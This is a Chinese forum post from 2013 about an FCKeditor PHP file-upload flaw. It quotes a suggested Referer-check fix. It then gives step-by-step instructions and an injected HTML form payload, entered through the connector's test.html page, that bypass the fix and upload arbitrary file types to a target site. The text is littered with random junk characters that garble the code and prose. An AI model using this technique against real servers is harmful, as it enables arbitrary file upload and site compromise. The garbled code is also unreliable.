漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php3 B& f; C+ p1 x4 k1 u
网上给出的修复方案是
# }) ]" Y9 ?, e" T$ r8 L, s* q修复方法,删除FCK编辑器用其他的编辑器1 v% w3 V; R: E; ]
或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件* c' j6 _+ E" b5 T
在( f: Q6 ?. m5 l7 p! E
require(‘config.php’);
& M9 u) Y m, x# _: P' lrequire(‘util.php’);' z/ M9 q8 R5 Q' J4 u9 c
的下面添加以下代码—————————–! s9 Z) u) `9 l
//防止外部提交' b$ w' g6 C" ]! C
function outsidepost()- w" Q. E2 S- G) u- D1 D
{5 @ B0 D& [; N3 x$ g8 E3 ~/ \
$servername=$_SERVER['SERVER_NAME'];4 w4 c9 m* O) I
$sub_from=@$_SERVER['HTTP_REFERER'];
3 b5 |9 Y; Z# j$ F" O$sub_len=strlen($servername);4 S2 b3 V* W& J) L, ?5 d
$checkfrom=substr($sub_from,7,$sub_len);
' f" C4 g3 v: q$ Y9 Tif($checkfrom!=$servername){
0 u& F% K- b# v" a4 g8 x! Hecho(“you don’t outsidepost!”);9 l( X% Z- r: t" C3 n: L
exit;( Y# O$ {5 V% M, V! M/ N
}
9 f; A& }. v) ~6 I0 U* D! X) V}$ J9 d4 q3 I4 z! G/ q
outsidepost();
& B5 Y) h" b7 V- g# @# W防止外部提交,但是没有防止内部提交,: ~/ e& O$ v7 v! ]: x
利用方法:. ]/ f$ E+ F% n. I! F5 o* ^
1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html$ }, I& `5 J5 ~ Z0 L
2,在Current Folder 框输入
6 }, `& E7 }1 e, _<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>3 N v) R& t5 L0 i, K8 ^
然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。
7 b- t9 X" y p( u- G% I _. DPS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。 |
发表于 2013-1-11 21:12:44
收藏
支持
反对